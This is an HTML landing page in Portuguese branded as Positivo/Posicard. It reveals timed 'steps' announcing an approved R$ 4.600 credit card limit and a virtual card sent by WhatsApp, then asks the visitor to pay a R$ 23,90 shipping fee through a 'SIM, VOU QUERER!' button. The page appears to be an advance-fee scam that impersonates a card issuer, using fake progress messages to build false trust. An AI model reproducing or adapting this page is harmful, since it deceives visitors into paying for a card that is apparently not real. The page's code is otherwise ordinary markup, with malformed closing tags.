<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <link href="css/iFB3LbfZInRN.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        .header {
            background: radial-gradient(934px at 6% 39.5%, rgb(0, 173, 202) 0.2%, rgb(0, 73, 144) 54.8%, rgb(250, 99, 160) 93.4%);
            color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            grid-area: top-bar;
        }

        .main-content {
            max-width: 450px;
            background-color: white;
            text-align: center;
            padding: 2rem 2rem 1rem 2rem;
            border-radius: 10px;
            box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
            margin: 0 auto;
        }

        .main-content h2 {
            margin-bottom: 20px;
        }

        .btn-custom {
            color: white;
            border: none;
            width: 100%;
            margin-bottom: 10px;
            background: radial-gradient(934px at 6% 39.5%, rgb(0, 173, 202) 0.2%, rgb(0, 73, 144) 54.8%, rgb(255, 0, 0) 93.4%);
            font-weight: 600;
            border-radius: 1rem;
            padding: .75rem 3rem;
            letter-spacing: .3px;
            line-height: 1.15;
        }

        .btn-custom:hover {
            color: black !important;
            background-color: #00adca !important;
            transform: scale(1.02) !important;
        }

        .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #e6007e;
            padding: 2rem 0.5rem;
            position: relative;
            margin-top: 50px;
        }

        #conclusao {
            display: none;
            /* Esconde o elemento por padrão */
        }

        #conclusao h4 {
            color: green;
            /* Define a cor do texto */
            font-weight: bold;
            /* Define o texto em negrito */
        }

        .char {
            border-top: solid px #00adca;
            background-color: #00adca;
            padding: 2px !important;
        }

        /* End custom CSS */
    </style>
    

    <!-- Meta Pixel Code -->
<script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '1249577276382820');
    fbq('track', 'PageView');
    fbq('track', 'ViewContent');
    </script>
    <noscript><img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=1249577276382820&ev=PageView&noscript=1"
    /></noscript>
    <!-- End Meta Pixel Code -->


    
</head>

<body>
    <div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">
        <div class="header">
            <img decoding="async" style="width: 120px;" src="images/nUWbJ6IJJ39U.png" alt="Imagem Centralizada" data-lazy-src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png" data-ll-status="loaded" class="entered lazyloaded"><noscript><img decoding="async" style="width: 120px;" src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png" alt="Imagem Centralizada"></noscript>
        </div>

        <div style="grid-area: content; padding: 0 1rem;">
            <div style="margin-top: 18px;" class="main-content text-center">
                <!-- Aqui vamos criar os blocos que aparecerão gradualmente -->
                <div id="etapa1" class="alert alert-secondary d-none">Gerando a Taxa de Correios - PAC...</div>
                <div id="etapa2" class="alert alert-secondary d-none">Taxa de envio gerada com sucesso!</div>
                <div id="etapa3" class="alert alert-secondary d-none">
                    O limite do Cartão de Crédito <strong>aprovado</strong> é de <strong>(R$ 4.600,00)</strong>
                </div>
                <div id="etapa4" class="alert alert-secondary d-none">
                    O prazo de entrega é de <strong>4 dias úteis</strong>
                </div>
                <div id="etapa5" class="alert alert-secondary d-none">
                    O total do envio: <strong>R$ 23,90</strong>
                </div>
                <div id="etapa6" class="alert alert-secondary d-none">
                    Após o pagamento da taxa de envio, em até <strong>2 horas</strong> iniciaremos o procedimento de envio
                </div>
                <div id="etapa7" class="alert alert-secondary d-none">
                    <strong>CARTÃO VIRTUAL COM LIMITE: 4.600</strong>
                </div>
                <div id="etapa8" class="alert alert-secondary d-none">
                    Será enviado para você um <strong>Cartão Virtual com limite de R$ 4.600</strong> para utilizá-lo imediatamente enquanto você aguarda o cartão físico chegar. Utilize hoje o virtual que enviaremos com as informações em seu WhatsApp.
                </div>

                <!-- Botão que aparecerá no final -->
                <button type="button" id="confirmar" onclick="location.href='../pagar-pac/index.html'" class="btn btn-custom w-100 rounded-pill mt-4 d-none">SIM, VOU QUERER!</button>
            </div>
        </div>

        <div class="footer py-4" id="footerChg">
            © 2024 Positivo Brasil. CNPJ 36.401.269/0001-27. <br> Todos os direitos reservados
        </div>
        <script>
            function mostrarEtapas() {
                // Mostrando cada etapa em intervalos de tempo
                setTimeout(() => {
                    document.getElementById('etapa1').classList.remove('d-none');
                }, 1000);
                setTimeout(() => {
                    document.getElementById('etapa2').classList.remove('d-none');
                }, 3000);
                setTimeout(() => {
                    document.getElementById('etapa3').classList.remove('d-none');
                }, 5000);
                setTimeout(() => {
                    document.getElementById('etapa4').classList.remove('d-none');
                }, 7000);
                setTimeout(() => {
                    document.getElementById('etapa5').classList.remove('d-none');
                }, 9000);
                setTimeout(() => {
                    document.getElementById('etapa6').classList.remove('d-none');
                }, 11000);
                setTimeout(() => {
                    document.getElementById('etapa7').classList.remove('d-none');
                }, 13000);
                setTimeout(() => {
                    document.getElementById('etapa8').classList.remove('d-none');
                }, 15000);
                setTimeout(() => {
                    document.getElementById('confirmar').classList.remove('d-none');
                }, 17000);
            }

            // Chamar a função para iniciar o processo de mostrar as etapas
            window.onload = mostrarEtapas;
        </script>

        <style>
            .alert {
                background-color: #dfdede;
                border: 1px solid #e6e6e6;
                padding: 15px;
                border-radius: 5px;
                text-align: left;
                margin-bottom: 10px;
            }

            .text-pink {
                color: #e6007e;
            }

            .d-none {
                display: none;
            }

            </div></body></style></div></body></html>